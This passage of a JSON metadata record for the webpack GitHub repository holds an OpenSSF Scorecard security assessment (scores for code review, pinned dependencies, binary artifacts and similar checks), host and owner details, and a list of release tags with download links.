repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpac